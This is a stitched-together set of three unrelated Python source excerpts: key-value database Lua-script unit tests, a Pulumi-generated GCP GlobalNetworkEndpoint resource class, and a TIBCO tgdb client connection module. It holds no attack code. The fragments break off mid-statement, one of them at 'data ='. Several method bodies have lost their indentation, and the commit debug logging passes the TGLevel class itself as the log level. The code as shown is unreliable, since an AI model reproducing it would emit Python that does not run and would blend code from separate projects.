        self.assertEqual(R(start=-2), {'0': 'i3', '1': 'i4'})
        # Out-of-bounds or out-of-order.
        self.assertEqual(R(start=5), {})
        self.assertEqual(R(start=-6), {})
        self.assertEqual(R(start=0, stop=0), {})
        self.assertEqual(R(start=-1, stop=3), {})
        self.assertEqual(R(start=3, stop=2), {})
        self.assertEqual(R(start=1, stop=1), {})
    def test_script_hash(self):
        """Exercise the Lua hash helpers: hmset/hset/hget/hmget/hgetall,
        hdel/hmdel, hsetnx, hlen and hcontains."""
        L = self.db.lua
        # Set multiple items, returns number set.
        res = L.hmset(table_key='h1', k1='v1', k2='v2', k3='v3')
        self.assertEqual(res['num'], '3')
        # Set individual item using key=..., value=...
        res = L.hset(table_key='h1', key='k1', value='v1-x')
        self.assertEqual(res['num'], '1')
        # Retrieve an individual item.
        self.assertEqual(L.hget(table_key='h1', key='k1'), {'value': 'v1-x'})
        # Missing key returns empty response.
        self.assertEqual(L.hget(table_key='h1', key='kx'), {})
        # Retrieve multiple items. Missing keys are omitted.
        res = L.hmget(table_key='h1', k1='', k2='', kx='')
        self.assertEqual(res, {'k1': 'v1-x', 'k2': 'v2'})
        # Retrieve all key/values in hash.
        res = L.hgetall(table_key='h1')
        self.assertEqual(res, {'k1': 'v1-x', 'k2': 'v2', 'k3': 'v3'})
        # Delete individual key, returns number deleted.
        self.assertEqual(L.hdel(table_key='h1', key='k2'), {'num': '1'})
        self.assertEqual(L.hdel(table_key='h1', key='k2'), {'num': '0'})
        # Delete multiple keys, returns number deleted.
        self.assertEqual(L.hmdel(table_key='h1', k1='', k3=''), {'num': '2'})
        self.assertEqual(L.hgetall(table_key='h1'), {})
        # We can conditionally set a key (if it does not exist). Returns 1 if
        # successful.
        res = L.hsetnx(table_key='h1', key='k1', value='v1-y')
        self.assertEqual(res, {'num': '1'})
        res = L.hsetnx(table_key='h1', key='k1', value='v1-z')
        self.assertEqual(res, {'num': '0'})
        # Set an additional key and verify hash contents for subsequent checks.
        L.hsetnx(table_key='h1', key='k2', value='v2')
        self.assertEqual(L.hgetall(table_key='h1'), {'k1': 'v1-y', 'k2': 'v2'})
        self.assertEqual(L.hlen(table_key='h1'), {'num': '2'})
        self.assertEqual(L.hcontains(table_key='h1', key='k1'), {'num': '1'})
        self.assertEqual(L.hcontains(table_key='h1', key='kx'), {'num': '0'})
        # Getting values from a non-existent hash returns empty response.
        self.assertEqual(L.hgetall(table_key='h2'), {})
def test_script_list_items(self):
self.assertEqual(self.db.script('list'), {})
self.db.update(k1='v1', k2='v2', k3='v3')
self.assertEqual(self.db.script('list'),
{'k1': 'v1', 'k2': 'v2', 'k3': 'v3'})
    def test_script_get_range(self):
        """The 'get_range' script returns key/value pairs whose key lies
        lexically within [start, stop] (both inclusive, either omittable).
        Keys compare as strings, hence 'k10' < 'k2'."""
        self.assertEqual(self.db.script('get_range'), {})
        data = {'k%s' % i: 'v%s' % i for i in range(11)}
        self.db.set_bulk(data)
        # Helper: call the script passing only the bounds that are given.
        def assertRange(start, stop, expected):
            params = {}
            if start: params['start'] = start
            if stop: params['stop'] = stop
            self.assertEqual(self.db.script('get_range', params), expected)
        assertRange('k8', None, {'k8': 'v8', 'k9': 'v9'})
        assertRange('k80', None, {'k9': 'v9'})
        assertRange(None, 'k2', {'k0': 'v0', 'k1': 'v1', 'k10': 'v10',
                                 'k2': 'v2'})
        assertRange(None, 'k2.2', self.db.script('get_range', {'stop': 'k2'}))
        assertRange('k10', 'k3', {'k10': 'v10', 'k2': 'v2', 'k3': 'v3'})
        assertRange('k101', 'k3', {'k2': 'v2', 'k3': 'v3'})
        assertRange('k10', 'k31', {'k10': 'v10', 'k2': 'v2', 'k3': 'v3'})
        assertRange('a', 'k1', {'k0': 'v0', 'k1': 'v1'})
        assertRange('k9', 'z', {'k9': 'v9'})
        assertRange('a', 'b', {})
        assertRange('x', 'y', {})
        assertRange('x', None, {})
        assertRange(None, 'a', {})
    def test_get_part(self):
        """The 'get_part' script slices a stored value with Python-like
        start/stop semantics (negative indexes allowed); a missing key
        yields no 'value' entry at all."""
        V = '0123456789'
        self.db.update(k1=V, k2='')
        # Helper: expected=None asserts the response has no 'value' key.
        def assertPart(key, start, stop, expected):
            params = {'key': key, 'start': start}
            if stop is not None:
                params['stop'] = stop
            result = self.db.script('get_part', params)
            if expected is None:
                self.assertTrue('value' not in result)
            else:
                self.assertEqual(result['value'], expected)
        assertPart('k1', 0, None, V)
        assertPart('k1', 0, -1, V[0:-1])
        assertPart('k1', 1, 3, V[1:3])
        assertPart('k1', 1, 30, V[1:])
        assertPart('k1', 20, 30, '')
        assertPart('k1', -3, None, V[-3:])
        assertPart('k1', -5, -1, V[-5:-1])
        assertPart('k1', -20, -10, '')
        assertPart('k1', -20, None, V[-20:])
        assertPart('k2', 0, None, '')
        assertPart('k2', 1, -1, '')
        assertPart('k2', -1, None, '')
        assertPart('k3', 0, None, None)
        assertPart('k3', 1, -1, None)
def test_queue_methods(self):
L = self.db.lua
for i in range(5):
L.queue_add(queue='tq', data='item-%s' % i)
self.assertEqual(L.queue_size(queue='tq'), {'num': '5'})
# By default one item is dequeued.
result = L.queue_pop(queue='tq')
self.assertEqual(result, {'0': 'item-0'})
self.assertEqual(L.queue_size(queue='tq'), {'num': '4'})
# We can also peek at items.
self.assertEqual(L.queue_peek(queue='tq'), {'0': 'item-1'})
self.assertEqual(L.queue_peek(queue='tq', n=2),
{'0': 'item-1', '1': 'item-2'})
# We can dequeue multiple items.
result = L.queue_pop(queue='tq', n=3)
self.assertEqual(result, {'0': 'item-1', '1': 'item-2', '2': 'item-3'})
# Peek when fewer items exist:
self.assertEqual(L.queue_peek(queue='tq', n=3), {'0': 'item-4'})
# It's OK to pop if fewer items exist.
result = L.queue_pop(queue='tq', n=3)
self.assertEqual(result, {'0': 'item-4'})
# No items -> empty string and zero count.
self.assertEqual(L.queue_pop(queue='tq'), {})
self.assertEqual(L.queue_peek(queue='tq'), {})
self.assertEqual(L.queue_size(queue='tq'), {'num': '0'})
L.queue_add(queue='tq', data='item-y')
L.queue_add(queue='tq', data='item-z')
self.assertEqual(L.queue_clear(queue='tq'), {'num': '2'})
self.assertEqual(L.queue_clear(queue='tq'), {'num': '0'})
for i in range(6):
L.queue_add(queue='tq', data='item-%s' % i)
# Reverse-peek.
self.assertEqual(L.queue_rpeek(queue='tq'), {'0': 'item-5'})
self.assertEqual(L.queue_rpeek(queue='tq', n=2),
{'0': 'item-5', '1': 'item-4'})
# Reverse-pop.
result = L.queue_rpop(queue='tq', n=2)
self.assertEqual(result, {'0': 'item-5', '1': 'item-4'})
self.assertEqual(L.queue_pop(queue='tq'), {'0': 'item-0'})
self.assertEqual(L.queue_peek(queue='tq'), {'0': 'item-1'})
self.assertEqual(L.queue_rpop(queue='tq'), {'0': 'item-3'})
self.assertEqual(L.queue_rpeek(queue='tq'), {'0': 'item-2'})
# We can request more items than exist with rpeek.
self.assertEqual(L.queue_rpeek(queue='tq', n=4),
{'0': 'item-2', '1': 'item-1'})
# We can attempt to reverse-pop more items than exist:
result = L.queue_rpop(queue='tq', n=4)
self.assertEqual(result, {'0': 'item-2', '1': 'item-1'})
self.assertEqual(L.queue_rpop(queue='tq'), {})
self.assertEqual(L.queue_pop(queue='tq'), {})
# Test loop termination logic when we have no keys in the db.
self.db.clear()
self.assertEqual(L.queue_rpop(queue='tq'), {})
self.assertEqual(L.queue_pop(queue='tq'), {})
# Test bulk-add feature.
data = | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GlobalNetworkEndpointArgs', 'GlobalNetworkEndpoint']
@pulumi.input_type
class GlobalNetworkEndpointArgs:
    """Input arguments for constructing a ``GlobalNetworkEndpoint`` resource.

    Generated by the Pulumi Terraform bridge (tfgen); the ``@pulumi.input_type``
    decorator introspects this class, so its structure must not be changed by
    hand.  Only ``global_network_endpoint_group`` and ``port`` are required.
    """
    def __init__(__self__, *,
                 global_network_endpoint_group: pulumi.Input[str],
                 port: pulumi.Input[int],
                 fqdn: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a GlobalNetworkEndpoint resource.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
        pulumi.set(__self__, "port", port)
        # Optional arguments are only recorded when explicitly provided.
        if fqdn is not None:
            pulumi.set(__self__, "fqdn", fqdn)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if project is not None:
            pulumi.set(__self__, "project", project)
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> pulumi.Input[str]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @global_network_endpoint_group.setter
    def global_network_endpoint_group(self, value: pulumi.Input[str]):
        pulumi.set(self, "global_network_endpoint_group", value)
    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def fqdn(self) -> Optional[pulumi.Input[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @fqdn.setter
    def fqdn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fqdn", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
@pulumi.input_type
class _GlobalNetworkEndpointState:
    """State bundle used to look up and filter existing
    ``GlobalNetworkEndpoint`` resources; every field is optional.

    Generated by the Pulumi Terraform bridge (tfgen); the ``@pulumi.input_type``
    decorator introspects this class, so its structure must not be changed by
    hand.
    """
    def __init__(__self__, *,
                 fqdn: Optional[pulumi.Input[str]] = None,
                 global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering GlobalNetworkEndpoint resources.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        # Only record the state fields that were explicitly provided.
        if fqdn is not None:
            pulumi.set(__self__, "fqdn", fqdn)
        if global_network_endpoint_group is not None:
            pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if project is not None:
            pulumi.set(__self__, "project", project)
    @property
    @pulumi.getter
    def fqdn(self) -> Optional[pulumi.Input[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @fqdn.setter
    def fqdn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fqdn", value)
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> Optional[pulumi.Input[str]]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @global_network_endpoint_group.setter
    def global_network_endpoint_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "global_network_endpoint_group", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
class GlobalNetworkEndpoint(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 fqdn: Optional[pulumi.Input[str]] = None,
                 global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A Global Network endpoint represents an IP address and port combination that exists outside of GCP.
        **NOTE**: Global network endpoints cannot be created outside of a
        global network endpoint group.
        To get more information about GlobalNetworkEndpoint, see:
        * [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
        * How-to Guides
            * [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
        ## Example Usage
        ### Global Network Endpoint
        ```python
        import pulumi
        import pulumi_gcp as gcp
        neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
            default_port=90,
            network_endpoint_type="INTERNET_FQDN_PORT")
        default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
            global_network_endpoint_group=neg.name,
            fqdn="www.example.com",
            port=90)
        ```
        ## Import
        GlobalNetworkEndpoint can be imported using any of these accepted formats:
        ```sh
         $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
         $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
         $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: GlobalNetworkEndpointArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        A Global Network endpoint represents an IP address and port combination that exists outside of GCP.
        **NOTE**: Global network endpoints cannot be created outside of a
        global network endpoint group.
        To get more information about GlobalNetworkEndpoint, see:
        * [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
        * How-to Guides
            * [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
        ## Example Usage
        ### Global Network Endpoint
        ```python
        import pulumi
        import pulumi_gcp as gcp
        neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
            default_port=90,
            network_endpoint_type="INTERNET_FQDN_PORT")
        default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
            global_network_endpoint_group=neg.name,
            fqdn="www.example.com",
            port=90)
        ```
        ## Import
        GlobalNetworkEndpoint can be imported using any of these accepted formats:
        ```sh
         $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
         $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        ```sh
         $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
        :param str resource_name: The name of the resource.
        :param GlobalNetworkEndpointArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalNetworkEndpointArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       fqdn: Optional[pulumi.Input[str]] = None,
                       global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                       ip_address: Optional[pulumi.Input[str]] = None,
                       port: Optional[pulumi.Input[int]] = None,
                       project: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the property bag from the keyword arguments.
            # (__props__ is reserved for the .get() path, which supplies opts.id.)
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = GlobalNetworkEndpointArgs.__new__(GlobalNetworkEndpointArgs)
            __props__.__dict__["fqdn"] = fqdn
            # Required unless the resource is being adopted through an existing URN.
            if global_network_endpoint_group is None and not opts.urn:
                raise TypeError("Missing required property 'global_network_endpoint_group'")
            __props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
            __props__.__dict__["ip_address"] = ip_address
            if port is None and not opts.urn:
                raise TypeError("Missing required property 'port'")
            __props__.__dict__["port"] = port
            __props__.__dict__["project"] = project
        super(GlobalNetworkEndpoint, __self__).__init__(
            'gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'GlobalNetworkEndpoint':
"""
Get an existing GlobalNetworkEndpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG | |
# Source: TIBCOSoftware/tgdb-client — api/python/src/tgdb/impl/connectionimpl.py
"""
* Copyright 2019 TIBCO Software Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); You may not use this file except
* in compliance with the License.
* A copy of the License is included in the distribution package with this file.
* You also may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* File name :connectionimpl.py
* Created on: 5/15/2019
* Created by: suresh
*
* SVN Id: $Id: connectionimpl.py 3256 2019-06-10 03:31:30Z ssubrama $
*
* This file encapsulates connection interfaces
"""
from tgdb.log import *
import tgdb.log as tglog
from tgdb.utils import *
from tgdb.impl.atomics import *
import typing
import tgdb.channel as tgchannel
import tgdb.impl.channelimpl as tgchannelimpl
import tgdb.pdu as tgpdu
import tgdb.impl.pduimpl as tgpduimpl
import tgdb.connection as tgconn
import tgdb.model as tgmodel
import tgdb.impl.entityimpl as tgentimpl
import tgdb.impl.gmdimpl as tggmdimpl
import tgdb.query as tgquery
import tgdb.impl.queryimpl as tgqueryimpl
import tgdb.exception as tgexception
import tgdb.bulkio as tgbulk
import tgdb.admin as tgadm
def findCommandForLang(lang: str) -> tgquery.TGQueryCommand:
    """Map a query-language tag ("tgql", "gremlin", or "gbc") to its TGQueryCommand."""
    commandsByLang = {
        "tgql": tgquery.TGQueryCommand.Execute,
        "gremlin": tgquery.TGQueryCommand.ExecuteGremlinStr,
        "gbc": tgquery.TGQueryCommand.ExecuteGremlin,
    }
    retCommand = commandsByLang.get(lang)
    if retCommand is None:
        raise tgexception.TGException("Unknown property for ConnectionDefaultQueryLanguage: %s", lang)
    return retCommand
def findCommandAndQueryString(query: str, props: tgchannel.TGProperties) -> typing.Tuple[tgquery.TGQueryCommand, str]:
    """Split an optional "lang://" prefix off *query*.

    Returns the command for that language plus the remainder of the query; when no
    prefix is present, falls back to the configured default query language and
    returns the query untouched.
    """
    lang: str = props.get(ConfigName.ConnectionDefaultQueryLanguage,
                          ConfigName.ConnectionDefaultQueryLanguage.defaultvalue)
    prefix, sep, remainder = query.partition("://")
    if sep:
        return findCommandForLang(prefix.lower()), remainder
    return findCommandForLang(lang.lower()), query
class ConnectionImpl(tgconn.TGConnection):
    def __init__(self, url, username, password, dbName: typing.Optional[str], env):
        """Build a connection facade around a freshly created channel.

        :param url: server link URL; also parsed for extra link properties.
        :param username: login user forwarded to the channel.
        :param password: login password forwarded to the channel.
        :param dbName: optional database name.
        :param env: initial property environment, seeded into TGProperties.
        """
        self.__url__ = url
        self.__username__ = username
        self.__password__ = password
        self.__props__: TGProperties = TGProperties(env)
        self._dbName = dbName
        self.__channel__: tgchannel.TGChannel = tgchannel.TGChannel.createChannel(url, username, password, dbName,
                                                                                  self.__props__)
        # Fold properties encoded in the URL itself into the connection properties.
        self.__props__.update(tgchannelimpl.LinkUrl.parse(url).properties)
        self.__gof__: tggmdimpl.GraphObjectFactoryImpl = tggmdimpl.GraphObjectFactoryImpl(self)
        # Pending change lists keyed by virtual id; flushed by commit(), dropped by rollback().
        self.__addEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
        self.__updateEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
        self.__removeEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
        # Monotonic request-id source for channel response waiters.
        self.__requestIds__ = AtomicReference('i', 0)
def _genBCRWaiter(self) -> tgchannelimpl.BlockingChannelResponseWaiter:
timeout = self.__props__.get(ConfigName.ConnectionOperationTimeoutSeconds, None)
if timeout is not None and isinstance(timeout, str):
timeout = float(timeout)
requestId = self.__requestIds__.increment()
return tgchannelimpl.BlockingChannelResponseWaiter(requestId, timeout)
    def connect(self):
        """Open the channel, authenticate, pull graph metadata, then push connection properties."""
        tglog.gLogger.log(tglog.TGLevel.Debug, "Attempting to connect")
        self.__channel__.connect()
        tglog.gLogger.log(tglog.TGLevel.Debug, "Connected, now logging in.")
        self.__channel__.start()
        tglog.gLogger.log(tglog.TGLevel.Debug, "Logged in, now acquiring metadata.")
        self.__initMetadata__()
        tglog.gLogger.log(tglog.TGLevel.Debug, "Acquired metadata, now sending connection properties.")
        self.__sendConnectionProperties()
        tglog.gLogger.log(tglog.TGLevel.Debug, 'Connected successfully')
def __initMetadata__(self):
waiter = self._genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.MetadataRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response = self.__channel__.send(request, waiter)
if response.verbid != tgpdu.VerbId.MetadataResponse:
raise tgexception.TGException('Invalid response object received')
self.__gof__.graphmetadata.registry = response.typeregistry
    def disconnect(self):
        """Disconnect from the server, then stop the channel's worker machinery."""
        self.__channel__.disconnect()
        self.__channel__.stop()
def commit(self):
channelResponse = self._genBCRWaiter()
try:
if gLogger.level is TGLevel.Debug:
def echoAttributes(ent: tgmodel.TGEntity):
gLogger.log(TGLevel, "Entity ID: %d", ent.virtualId)
attr: tgmodel.TGAttribute
for attr in ent.attributes:
gLogger.log(TGLevel, " Attribute: %s", attr._value)
[echoAttributes(ent) for ent in self.__addEntities__.values()]
[echoAttributes(ent) for ent in self.__updateEntities__.values()]
[echoAttributes(ent) for ent in self.__removeEntities__.values()]
request: tgpduimpl.CommitTransactionRequestMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.CommitTransactionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
attrDescSet = self.graphObjectFactory.graphmetadata.attritubeDescriptors
request.addCommitList(self.__addEntities__, self.__updateEntities__, self.__removeEntities__, attrDescSet)
response: tgpduimpl.CommitTransactionResponseMessage = self.__channel__.send(request, channelResponse)
if response.exception is not None:
raise response.exception
response.finishReadWith(self.__addEntities__, self.__updateEntities__, self.__removeEntities__,
self.__gof__.graphmetadata.registry)
for id in self.__removeEntities__:
self.__removeEntities__[id].markDeleted()
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, "Transaction commit succeeded")
except IOError as e:
raise tgexception.TGException.buildException("IO Error", cause=e)
finally:
for id in self.__addEntities__:
self.__addEntities__[id].resetModifiedAttributes()
for id in self.__updateEntities__:
self.__updateEntities__[id].resetModifiedAttributes()
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
    def refreshMetadata(self):
        """Re-fetch the server's type registry (same handshake as at connect time)."""
        self.__initMetadata__()
def rollback(self):
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
    def __sendConnectionProperties(self):
        """Push the channel's properties to the server."""
        request: tgpduimpl.ConnectionPropertiesMessage = tgpduimpl.TGMessageFactory.createMessage(
            tgpdu.VerbId.ConnectionPropertiesMessage, authtoken=self.__channel__.authtoken,
            sessionid=self.__channel__.sessionid)
        request.props = self.__channel__.properties
        # No waiter is passed: no response is awaited for this message.
        self.__channel__.send(request)
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startImport(self, loadopt: typing.Union[str, tgbulk.TGLoadOptions] = tgbulk.TGLoadOptions.Insert,
erroropt: typing.Union[str, tgbulk.TGErrorOptions] = tgbulk.TGErrorOptions.Stop,
dateformat: typing.Union[str, tgbulk.TGDateFormat] = tgbulk.TGDateFormat.YMD,
props: typing.Optional[TGProperties] = None):
import tgdb.impl.bulkioimpl as tgbulkimpl
ret: tgbulkimpl.BulkImportImpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginImportSessionRequest
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
if isinstance(loadopt, str):
loadopt = tgbulk.TGErrorOptions.findVal(loadopt)
if loadopt == tgbulk.TGLoadOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid load option!")
if isinstance(erroropt, str):
erroropt = tgbulk.TGErrorOptions.findVal(erroropt)
if erroropt == tgbulk.TGErrorOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid error option!")
if isinstance(dateformat, str):
dateformat = tgbulk.TGDateFormat.findVal(dateformat)
if dateformat == tgbulk.TGDateFormat.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid Date-Time Format!")
request.loadopt = loadopt
request.erroropt = erroropt
request.dtformat = dateformat
response: tgpduimpl.BeginImportSessionResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
ret = tgbulkimpl.BulkImportImpl(self, props)
return ret
def partialImportEntity(self, entType: tgmodel.TGEntityType, reqIdx: int, totReqs: int, data: str,
attrList: typing.List[str]) -> typing.List[tgadm.TGImportDescriptor]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialImportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.type = entType
request.reqIdx = reqIdx
request.totalRequestsForType = totReqs
request.data = data
request.attrList = attrList
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
